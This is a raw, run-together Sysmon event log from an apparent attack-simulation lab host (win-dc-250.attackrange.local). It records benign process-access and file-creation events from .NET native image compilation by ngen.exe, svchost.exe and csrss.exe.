13:21:36.147{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4560-6000-B001-000000009A01}4172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005875Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:36.007{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4560-6000-AF01-000000009A01}4144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005874Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:36.007{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4560-6000-AF01-000000009A01}4144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005873Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:36.007{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4560-6000-AF01-000000009A01}4144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005884Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:38.991{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4562-6000-B201-000000009A01}2200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005883Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:38.991{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4562-6000-B201-000000009A01}2200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005882Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:38.866{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4562-6000-B101-000000009A01}3040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005881Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:38.851{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4562-6000-B101-000000009A01}3040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005880Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:38.851{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4562-6000-B101-000000009A01}3040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005879Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:38.710{08A6967A-4560-6000-B001-000000009A01}4172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\104c-0\Microsoft.Build.Tasks.v4.0.dll2021-01-14 13:21:38.710 10341000x80000000000000005895Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:39.882{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4563-6000-B501-000000009A01}5060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005894Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:39.866{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4563-6000-B501-000000009A01}5060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005893Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:39.866{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4563-6000-B501-000000009A01}5060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005892Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:39.804{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4563-6000-B401-000000009A01}1228C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005891Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:39.788{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4563-6000-B401-000000009A01}1228C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005890Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:39.788{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4563-6000-B401-000000009A01}1228C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005889Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:39.741{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4563-6000-B301-000000009A01}5068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005888Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:39.741{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4563-6000-B301-000000009A01}5068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005887Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:39.741{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4563-6000-B301-000000009A01}5068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005886Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:39.663{08A6967A-4562-6000-B201-000000009A01}2200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\898-0\Microsoft.Build.Utilities.v4.0.dll2021-01-14 13:21:39.663 10341000x80000000000000005885Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:38.991{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4562-6000-B201-000000009A01}2200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005901Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:40.976{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4564-6000-B701-000000009A01}2440C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005900Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:40.960{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4564-6000-B701-000000009A01}2440C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005899Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:40.960{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4564-6000-B701-000000009A01}2440C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005898Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:40.929{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4564-6000-B601-000000009A01}2300C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005897Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:40.898{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4564-6000-B601-000000009A01}2300C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005896Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 